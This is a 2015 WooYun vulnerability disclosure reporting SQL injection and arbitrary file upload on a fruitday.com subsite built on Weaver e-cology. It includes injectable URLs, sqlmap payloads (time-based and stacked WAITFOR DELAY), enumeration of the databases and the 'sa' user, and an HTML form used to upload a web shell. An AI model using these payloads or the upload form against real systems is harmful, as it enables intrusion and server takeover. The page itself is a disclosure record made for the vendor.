当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130601

漏洞标题:天天果园某分站存在多处SQL注入,且可任意上传导致GetShell

相关厂商:fruitday.com

漏洞作者: 浮萍

提交时间:2015-07-31 08:32

修复时间:2015-09-18 11:20

公开时间:2015-09-18 11:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-31: 细节已通知厂商并且等待厂商处理中
2015-08-04: 厂商已经确认,细节仅向厂商公开
2015-08-14: 细节向核心白帽子及相关领域专家公开
2015-08-24: 细节向普通白帽子公开
2015-09-03: 细节向实习白帽子公开
2015-09-18: 细节向公众公开

简要描述:

SQL注入
任意文件上传

详细说明:

http://hq.fruitday.com:88/login/Login.jsp?logintype=1
天天鲜果协同商务系统
采用的泛微系统
根据
WooYun: 泛微e-cology系统又一sql注入(无需登录)
WooYun: 泛微某系统漏洞集合(不拿shell不是合格的白帽子)
WooYun: 泛微某系统通用型SQL注入(无需登录)
构造注入点
第一处

http://hq.fruitday.com:88//homepage/LoginHomepage.jsp?hpid=52*&isfromportal=1


在hpid处

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 115 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: http://hq.fruitday.com:88//homepage/LoginHomepage.jsp?hpid=52 WAITFOR DELAY '0:0:5'&isfromportal=1
---


web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008


数据库

back-end DBMS: Microsoft SQL Server 2008
available databases [7]:
[*] ecology
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


漏洞证明:

第二处:

http://hq.fruitday.com:88/weaver/weaver.email.FileDownloadLocation?fileid=39*&download=1


sqlmap identified the following injection points with a total of 92 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: http://hq.fruitday.com:88/weaver/weaver.email.FileDownloadLocation?fileid=39;WAITFOR DELAY '0:0:5'--&download=1
---
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---


数据库

back-end DBMS: Microsoft SQL Server 2008
available databases [7]:
[*] ecology
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


current database:    'ecology'
current user: 'sa'


选区_080.png


执行ipconfig

选区_081.png


三 任意文件上传
构造表单

<form method='post' action='http://hq.fruitday.com:88/tools/SWFUpload/upload.jsp'  enctype="multipart/form-data" > 
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>


上传文件然后访问http://hq.fruitday.com:88/null1.jsp

选区_079.png


修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-04 11:19

厂商回复:

非常感谢您提供的信息,我们会尽快确认。

最新状态:

暂无